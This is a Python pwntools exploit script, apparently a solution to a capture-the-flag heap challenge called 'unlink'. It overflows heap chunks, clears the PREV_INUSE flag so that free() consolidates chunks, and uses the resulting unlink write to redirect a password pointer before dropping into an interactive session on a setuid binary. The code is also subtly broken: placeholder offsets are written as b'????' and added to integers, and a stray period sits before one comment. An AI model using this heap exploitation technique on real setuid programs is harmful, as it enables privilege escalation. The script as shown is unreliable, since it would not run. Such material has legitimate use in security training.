import os
from pwn import *

fileName = "./unlink"

p = process(fileName, setuid=True)
e = ELF(fileName)

bAddr = p.recv()[-12:-3]
passwdAddr = p32(int(bAddr,16) + b'????')
heapAddr = p32(int(bAddr,16) + b'????')

#Overwrite b
payload = b'aaaabbbb' + b'25082' + b'\x00ddeeeeffffgggghhhh' #\x00 to disconnect our password so strcmp() can work with
payload += b'\x00'*4 + b'\x29' + b'\x00'*3 . # don't touch the size of c

#Overwrite c
payload += passwdAddr + heapAddr # Replacing the password address with our heap address so that we can input whatever we want
payload += b'CCCCDDDDEEEEFFFFGGGGHHHH'
payload += b'\x00'*4 + b'\x28' + b'\x00'*3 # \x28 set P flag to 0, telling free() to consolidate chunk c into b, allowing us to do arbiratry write above.

p.sendline(payload)
p.interactive()